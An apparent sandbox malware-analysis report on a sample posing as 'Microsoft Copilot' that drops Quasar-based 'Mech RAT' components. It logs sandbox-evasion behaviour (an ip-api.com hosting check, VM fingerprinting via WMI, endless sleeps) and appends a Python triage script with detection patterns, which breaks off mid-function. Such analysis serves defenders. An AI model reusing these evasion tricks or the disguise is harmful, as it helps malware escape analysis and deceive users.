                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (identical entry listed 80 times across the powershell.exe instances spawned during the analysis)

                    Malware Analysis System Evasion

                    Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1, Host: ip-api.com, Connection: Keep-Alive
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController (listed 3 times)
                    Source: PixpFUv4G7.exe, 00000000.00000002.1258939733.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Copilot.exe, 00000001.00000002.2504673520.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, Copilot.exe, 00000001.00000000.1250594519.0000000000962000.00000002.00000001.01000000.00000005.sdmp, Microsoft Copilot.exe.1.dr | Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Memory allocated: 2A60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Memory allocated: 1ABB0000 memory reserve | memory write watch
                    Source: C:\Windows\SysWOW64\unarchiver.exe | Memory allocated: D90000 memory reserve | memory write watch
                    Source: C:\Windows\SysWOW64\unarchiver.exe | Memory allocated: 2A00000 memory reserve | memory write watch
                    Source: C:\Windows\SysWOW64\unarchiver.exe | Memory allocated: 4A00000 memory commit | memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Memory allocated: 1660000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Memory allocated: 1B1B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Memory allocated: 1110000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Memory allocated: 1AC30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Memory allocated: CA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Memory allocated: 1A910000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Memory allocated: EB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Memory allocated: 1A7F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\unarchiver.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Window / User API: threadDelayed 9590
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5975
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3773
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7699
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1891
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7700
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1900
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2598
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6951
                    Source: C:\Windows\SysWOW64\7za.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll
                    Source: C:\Windows\SysWOW64\7za.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.Tests.dll
                    Source: C:\Windows\SysWOW64\7za.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.TestPlatform.AdapterUtilities.dll
                    Source: C:\Windows\SysWOW64\7za.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Open.Nat.dll
                    Source: C:\Windows\SysWOW64\7za.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.dll
                    Source: C:\Windows\SysWOW64\7za.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.TestFramework.Extensions.dll
                    Source: C:\Windows\SysWOW64\7za.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.CodeCoverage.Shim.dll
                    Source: C:\Windows\SysWOW64\7za.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Mdb.dll
                    Source: C:\Windows\SysWOW64\7za.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\BouncyCastle.Crypto.dll
                    Source: C:\Windows\SysWOW64\7za.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe
                    Source: C:\Windows\SysWOW64\7za.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.MSTest.TestAdapter.dll
                    Source: C:\Windows\SysWOW64\7za.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\protobuf-net.dll
                    Source: C:\Windows\SysWOW64\7za.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.Interface.dll
                    Source: C:\Windows\SysWOW64\7za.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Gma.System.MouseKeyHook.dll
                    Source: C:\Windows\SysWOW64\7za.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.TestFramework.dll
                    Source: C:\Windows\SysWOW64\7za.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Guna.UI2.dll
                    Source: C:\Windows\SysWOW64\7za.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Rocks.dll
                    Source: C:\Windows\SysWOW64\7za.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.dll
                    Source: C:\Windows\SysWOW64\7za.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll
                    Source: C:\Windows\SysWOW64\7za.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin
                    Source: C:\Windows\SysWOW64\7za.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Vestris.ResourceLib.dll
                    Source: C:\Windows\SysWOW64\7za.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\aa-DJ\Quasar.resources.dll
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe TID: 576 | Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6012 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608 | Thread sleep time: -7378697629483816s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860 | Thread sleep count: 7699 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856 | Thread sleep count: 1891 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884 | Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148 | Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3452 | Thread sleep count: 2598 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3284 | Thread sleep count: 6951 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5256 | Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe TID: 6836 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe TID: 2168 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe TID: 4260 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe TID: 6120 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | File Volume queried: C:\ FullSizeInformation (listed 4 times)
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | File Volume queried: C:\ FullSizeInformation (listed 4 times)
                    Source: C:\Windows\SysWOW64\unarchiver.exe | Code function: 3_2_00CFB286 GetSystemInfo,3_2_00CFB286
                    Source: Microsoft Copilot.exe.1.dr | Binary or memory string: vmware
                    Source: PixpFUv4G7.exe, 00000000.00000002.1257409990.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                    Source: PixpFUv4G7.exe, 00000000.00000002.1257409990.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                    Source: Copilot.exe, 00000001.00000002.2513107629.000000001BA78000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Process information queried: ProcessInformation
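The entries in this section are the classic sandbox-evasion set: a datacenter/hosting lookup against ip-api.com (fields=hosting returns a single true/false line), WMI queries for Win32_VideoController and Win32_ComputerSystem to fingerprint the hypervisor, a Sandboxie artifact string (SBIEDLL.DLL), and sleeps of 922337203685477 ms, which is exactly TimeSpan.MaxValue in milliseconds (Int64.MaxValue ticks / 10000), i.e. a .NET Thread.Sleep that never returns on its own. The following triage script is an added example written for this page, not Joe Sandbox code: it takes constructed event records shaped like the entries above (field names, the event shape and the 30-second / 30-iteration thresholds are this example's own choices, mirroring the thresholds the report prints) and tags each evasion technique so an analyst can separate them from ordinary WMI and sleep activity.

```python
"""Tag sandbox-evasion behaviours from Joe Sandbox-style event records (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

# 922337203685477 ms == TimeSpan.MaxValue in milliseconds (Int64.MaxValue ticks / 10000):
# a .NET Thread.Sleep with that value is an open-ended stall, not a real timer.
DOTNET_MAX_SLEEP_MS = (2**63 - 1) // 10_000
SLEEP_THRESHOLD_MS = 30_000      # mirrors the report's ">= 30000" sleep threshold
SLEEP_LOOP_THRESHOLD = 30        # mirrors the report's "> 30" sleep-count threshold
VM_FINGERPRINT_CLASSES = {"win32_videocontroller", "win32_computersystem",
                          "win32_bios", "win32_diskdrive"}
SANDBOX_STRINGS = {"sbiedll.dll", "vmware", "vbox", "virtualbox"}

# Constructed events mirroring the report's entries; the dict layout is this example's own.
SAMPLE_EVENTS = [
    {"type": "http", "process": "Copilot.exe", "host": "ip-api.com",
     "request": "GET /line/?fields=hosting HTTP/1.1"},
    {"type": "wmi", "process": "Copilot.exe", "query": "SELECT * FROM Win32_VideoController"},
    {"type": "wmi", "process": "Copilot.exe", "query": "Select * from Win32_ComputerSystem"},
    {"type": "sleep", "process": "Copilot.exe", "delay_ms": 922337203685477},
    {"type": "sleep_loop", "process": "powershell.exe", "count": 9590},
    {"type": "string", "process": "Copilot.exe", "value": "SBIEDLL.DLL"},
    {"type": "sleep", "process": "Copilot.exe", "delay_ms": 500},   # ordinary, not flagged
]


def is_hosting_check(event):
    """ip-api.com request whose 'fields' query asks for the hosting/datacenter flag."""
    if event.get("type") != "http":
        return False
    parts = event.get("request", "").split()
    if len(parts) < 2:
        return False
    fields = parse_qs(urlsplit(parts[1]).query).get("fields", [])
    return (event.get("host", "").lower().endswith("ip-api.com")
            and any("hosting" in f.lower() for f in fields))


def is_vm_fingerprint(event):
    """WQL SELECT against a class whose values reveal the hypervisor (GPU, BIOS, chassis)."""
    if event.get("type") != "wmi":
        return False
    m = re.search(r"\bfrom\s+(\w+)", event.get("query", ""), re.IGNORECASE)
    return bool(m) and m.group(1).lower() in VM_FINGERPRINT_CLASSES


def is_evasive_sleep(event):
    """Either a single very long sleep or a tight loop of many short sleeps."""
    if event.get("type") == "sleep":
        return event.get("delay_ms", 0) >= SLEEP_THRESHOLD_MS
    if event.get("type") == "sleep_loop":
        return event.get("count", 0) > SLEEP_LOOP_THRESHOLD
    return False


def is_sandbox_string(event):
    """Known analysis-tool / hypervisor artifact names found in memory."""
    return event.get("type") == "string" and event.get("value", "").lower() in SANDBOX_STRINGS


def triage(events):
    """Return (process, tag, detail) findings for every evasive event."""
    findings = []
    for e in events:
        if is_hosting_check(e):
            findings.append((e["process"], "datacenter-check", e["host"]))
        elif is_vm_fingerprint(e):
            findings.append((e["process"], "vm-fingerprint", e["query"]))
        elif is_evasive_sleep(e):
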